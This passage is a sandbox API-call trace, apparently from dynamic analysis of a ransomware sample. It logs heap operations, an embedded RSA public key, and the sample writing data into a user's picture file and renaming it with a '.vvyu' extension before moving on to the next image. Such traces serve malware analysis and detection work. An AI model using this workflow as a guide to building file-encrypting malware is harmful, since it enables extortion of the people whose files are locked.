hHeap=0x620000) returned 1 [0199.870] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3290 | out: hHeap=0x620000) returned 1 [0199.870] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0199.871] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.871] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3290 [0199.871] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a00 [0199.871] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3248 [0199.871] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0199.871] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea3230 [0199.871] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0199.871] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99d28 [0199.871] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0199.871] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0199.871] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0199.871] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c998c8 [0199.871] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0199.871] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0199.872] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0199.872] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3248 | out: hHeap=0x620000) returned 1 [0199.872] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0199.872] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3230 | out: hHeap=0x620000) returned 1 [0199.872] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0199.872] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0199.872] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3290 | out: hHeap=0x620000) returned 1 [0199.872] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0199.872] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0199.873] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0199.873] GetCurrentThreadId () returned 0x66c [0199.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0199.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea7a58 [0199.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9728 [0199.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c0e0 [0199.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0199.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0199.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0199.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0199.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.874] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.874] GetCurrentThreadId () returned 0x66c [0199.874] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.874] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.874] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0199.874] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.874] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.874] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.875] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.875] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0199.875] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0199.875] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0199.875] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccac38 [0199.875] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0199.875] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0199.875] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0199.875] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3290 [0199.875] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0199.875] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0199.875] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0199.875] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0199.876] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0199.876] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0199.876] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0199.876] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0199.876] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3230 [0199.876] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0199.876] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0199.876] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0199.876] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0199.876] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0199.876] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0199.876] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0199.876] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3248 [0199.876] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0199.876] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0199.876] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0199.876] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3218 [0199.876] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0199.876] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea32a8 [0199.876] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0199.876] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0199.877] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0199.877] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3278 [0199.877] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0199.877] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3260 [0199.877] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0199.877] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea32c0 [0199.877] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3260 | out: hHeap=0x620000) returned 1 [0199.877] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3260 [0199.877] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3278 | out: hHeap=0x620000) returned 1 [0199.877] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0199.877] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0199.877] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0199.877] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0199.877] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0199.877] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3230 | out: hHeap=0x620000) returned 1 [0199.877] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3230 [0199.877] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0199.877] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0199.877] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3290 | out: hHeap=0x620000) returned 1 [0199.877] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0199.878] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea32c0 | out: hHeap=0x620000) returned 1 [0199.878] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0199.878] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0199.878] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99c10 [0199.878] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0199.878] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0199.878] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3230 | out: hHeap=0x620000) returned 1 [0199.878] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0199.878] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0199.878] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e960b0 [0199.878] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0199.879] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c0e0 | out: hHeap=0x620000) returned 1 [0199.879] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0199.879] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e960b0 | out: hHeap=0x620000) returned 1 [0199.880] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0199.880] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0199.880] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.881] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0199.881] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0199.881] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0199.881] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3260 | out: hHeap=0x620000) returned 1 [0199.881] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0199.881] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea32a8 | out: hHeap=0x620000) returned 1 [0199.881] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0199.881] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3248 | out: hHeap=0x620000) returned 1 [0199.881] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3218 | out: hHeap=0x620000) returned 1 [0199.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0199.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9728 | out: hHeap=0x620000) returned 1 [0199.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0199.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3200 | out: hHeap=0x620000) returned 1 [0199.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8f6f0 | out: hHeap=0x620000) returned 1 [0199.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0199.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0199.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0199.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0199.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0199.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0199.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0199.885] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0199.885] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0199.885] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0199.885] WriteFile (in: hFile=0x510, lpBuffer=0x2ea99b0*, nNumberOfBytesToWrite=0xf0cb, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea99b0*, lpNumberOfBytesWritten=0x312fb14*=0xf0cb, lpOverlapped=0x0) returned 1 [0199.887] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea99b0 | out: hHeap=0x620000) returned 1 [0199.887] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0xf0d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.887] WriteFile (in: hFile=0x510, lpBuffer=0x2e95ea0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95ea0*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0199.887] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0199.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0199.888] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0199.888] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0199.888] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.888] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.888] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0199.889] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0199.889] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0199.889] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0199.889] CloseHandle (hObject=0x510) returned 1 [0199.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0199.891] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x880) returned 0x2ea6a68 [0199.891] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0199.891] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\kyMAgs7f-4q1mza r\\dTf66.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\kymags7f-4q1mza r\\dtf66.png"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\kyMAgs7f-4q1mza r\\dTf66.png.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\kymags7f-4q1mza r\\dtf66.png.vvyu")) returned 1 [0199.892] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.892] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0199.893] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0199.896] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91710 | out: hHeap=0x620000) returned 1 [0199.896] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a9074a0, ftCreationTime.dwHighDateTime=0x1d89790, ftLastAccessTime.dwLowDateTime=0x13ba3060, ftLastAccessTime.dwHighDateTime=0x1d89cc1, ftLastWriteTime.dwLowDateTime=0x13ba3060, ftLastWriteTime.dwHighDateTime=0x1d89cc1, nFileSizeHigh=0x0, nFileSizeLow=0x12a2c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="k_XON6PdpszzEOE.bmp", cAlternateFileName="K_XON6~1.BMP")) returned 1 [0199.896] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.896] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91710 [0199.896] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.896] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\kyMAgs7f-4q1mza r\\k_XON6PdpszzEOE.bmp") returned=".bmp" [0199.896] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\kyMAgs7f-4q1mza r\\k_XON6PdpszzEOE.bmp" (normalized: "c:\\users\\keecfmwgj\\pictures\\kymags7f-4q1mza r\\k_xon6pdpszzeoe.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0199.897] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=76332) returned 1 [0199.897] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0199.899] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x12a06, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.900] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0199.901] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0199.902] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0199.902] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0199.902] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x12a2c, lpOverlapped=0x0) returned 1 [0199.903] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.903] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0199.903] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.903] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.903] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c0e0) returned 1 [0199.904] CryptCreateHash (in: hProv=0x67c0e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0199.904] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0199.904] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0199.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0199.904] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0199.904] GetLastError () returned 0x0 [0199.905] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0199.905] CryptReleaseContext (hProv=0x67c0e0, dwFlags=0x0) returned 1 [0199.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0199.905] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0199.905] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0199.905] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0199.905] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0199.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0199.905] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0199.905] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x12a30) returned 0x2ea99b0 [0199.906] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0199.906] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0199.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0199.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 